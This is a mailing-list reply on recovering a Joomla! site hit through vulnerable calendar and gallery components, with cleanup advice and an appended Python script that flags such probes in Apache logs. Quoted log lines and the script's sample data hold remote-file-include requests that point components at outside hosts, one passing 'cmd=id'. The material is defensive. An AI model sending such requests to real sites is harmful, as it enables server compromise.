Re: PLUG website down

Author: JD Austin
Date:  
To: plug-discuss
Subject: Re: PLUG website down
wrote:
> I have been alerted to the fact that the PLUG site is down. Cracked is
> more likely. There have been a rash of security problems with Joomla!
> addins. I thought I patched the calendar but maybe the early fix was not
> good enough.
>
> I have recent backups so I'll have it back as soon as I can. The current
> calendar component will be going away, however. I'll install a new one.
>
> Alan
>
>
> ---------------------------------------------------
> PLUG-discuss mailing list -
> To subscribe, unsubscribe, or to change your mail settings:
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>

If you're not on version 1.0.10 upgrade now:
http://www.joomla.org/content/view/1510/74/
I wouldn't be surprised if they make major changes in Joomla to stomp
out this type of thing.

In all cases where I've had an issue, the database was unaffected, only the files.
After the initial panic that I might have been rooted, I was relieved
when I found out how they whacked the index.php and configuration.php
files on a few of my inactive sites.

After you restore the site, remove com_extcalendar and com_galeria if
they're still installed.
Check the directory structure to make sure they're gone.
Also check your temp directory for strangeness, like a '.a' directory.

If you check your logs you'll find stuff like this:

    XXXXX.org/statistics/logs/access_log:64.38.12.106 - - [18/Jul/2006:15:25:24 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.podgorz.cc/cc5.php?? HTTP/1.0" 200 17757 "-" "Mozilla/5.0"
    XXXXX.com/statistics/logs/access_log:85.104.97.199 - - [18/Jul/2006:09:47:29 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://61.1.197.244/x/tool25.txt?&cmd=id HTTP/1.0" 404 958 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
    XXXXX.com/statistics/logs/access_log:85.104.97.199 - - [18/Jul/2006:09:57:34 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://61.1.197.244/x/tool25.txt?&cmd=id HTTP/1.0" 404 958 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"



I regularly check to see what they're trying to circumvent now by
grepping for this type of vulnerability in the apache access logs:

    /bin/grep mosConfig_absolute_path=http /home/httpd/vhosts/*/statistics/logs/access_log | mail -s 'hack attempts'

The location of your apache logs may be different. If you don't have
root you can download the logs for your domain and grep them locally.

JD

--
JD Austin
Twin Geckos Technology Services LLC
email:
http://www.twingeckos.com
phone/fax: 480.288.8195

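The log check JD describes, written out as a small Python script. This is an added example, not code from the post or from the Joomla! project. It assumes the Apache combined log format (with the optional "path/access_log:" prefix that grepping several vhost logs at once produces), looks at the mosConfig_absolute_path and mosConfig_live_site parameters, and URL-decodes the query string twice so that a percent-encoded "http%3A%2F%2F" is caught where the literal grep above would miss it. The sample log lines are constructed for this example, using documentation IPs and hostnames rather than the addresses quoted in the post.

```python
"""Flag Joomla!/Mambo 1.0.x remote-file-include probes in Apache access logs.

Added example, not code from the original post. Assumes the Apache
combined log format; the SAMPLE_LOG lines below are constructed.
"""
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote, urlsplit

# Combined log format, with an optional "path/access_log:" prefix such as
# grep prints when it is run over several vhost logs at once.
LOG_RE = re.compile(
    r'^(?:\S*access_log:)?(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Globals that 1.0.x-era components trusted as an include path (assumed
# watch list; extend it with whatever your own logs show being abused).
WATCHED_PARAMS = {"mosConfig_absolute_path", "mosConfig_live_site"}
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

# Constructed sample lines (documentation IPs / hostnames, not real traffic).
SAMPLE_LOG = [
    # 1. Ordinary page view: must not be flagged.
    '198.51.100.7 - - [18/Jul/2006:08:00:01 -0700] "GET /index.php?option=com_content&task=view&id=5 HTTP/1.1" 200 12345 "-" "Mozilla/5.0"',
    # 2. Remote include through the calendar component; a 200 with a body
    #    means the component actually fetched and ran the remote file.
    '192.0.2.10 - - [18/Jul/2006:15:25:24 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://evil.example.net/cc5.php?? HTTP/1.0" 200 17757 "-" "Mozilla/5.0"',
    # 3. Same probe against the gallery component, with a grep-style file prefix;
    #    404 because the component is not installed on this vhost.
    'vhost.example.com/statistics/logs/access_log:192.0.2.11 - - [18/Jul/2006:09:47:29 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://evil.example.net/x/tool25.txt?&cmd=id HTTP/1.0" 404 958 "-" "Mozilla/4.0"',
    # 4. Percent-encoded variant that a plain "grep mosConfig_absolute_path=http" misses.
    '192.0.2.11 - - [18/Jul/2006:09:57:34 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http%3A%2F%2Fevil.example.net%2Fx%2Ftool25.txt%3F HTTP/1.0" 404 958 "-" "Mozilla/4.0"',
    # 5. Local path override, not a remote include: outside this rule.
    '192.0.2.12 - - [18/Jul/2006:10:00:00 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=/tmp/.a HTTP/1.0" 200 100 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Split one access-log line into its fields; None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def find_rfi(line):
    """Return details of a remote-include attempt on this line, else None."""
    rec = parse_line(line)
    if rec is None:
        return None
    parts = urlsplit(rec["target"])
    # Decode twice: double-encoding is the usual way past a literal grep.
    query = unquote(unquote(parts.query))
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name in WATCHED_PARAMS and value.lower().startswith(REMOTE_SCHEMES):
            return {
                "ip": rec["ip"],
                "time": rec["ts"],
                "component": parts.path,
                "param": name,
                "remote_url": value,
                "status": int(rec["status"]),
                # 200 means the vulnerable component answered; 404 means it
                # was not there to be abused, but the host is still probing.
                "served": rec["status"] == "200",
            }
    return None


def scan(lines):
    """All remote-include findings in an iterable of log lines, in order."""
    return [f for f in map(find_rfi, lines) if f is not None]


def by_source(findings):
    """Attempts per source IP, the summary worth putting in the daily mail."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for f in hits:
        flag = " SERVED" if f["served"] else ""
        print(f"{f['ip']} {f['component']} {f['param']}={f['remote_url']} [{f['status']}{flag}]")
    print(dict(by_source(hits)))
```

Feed it the real logs with something like `python3 rfi_check.py < access_log` after swapping SAMPLE_LOG for `sys.stdin`, and pipe the output into `mail` the way the grep above is. The "served" flag is the one to act on first: a 200 with a sizeable body from extcalendar.php means the include worked and the file check in the post (index.php, configuration.php, the temp directory) is due.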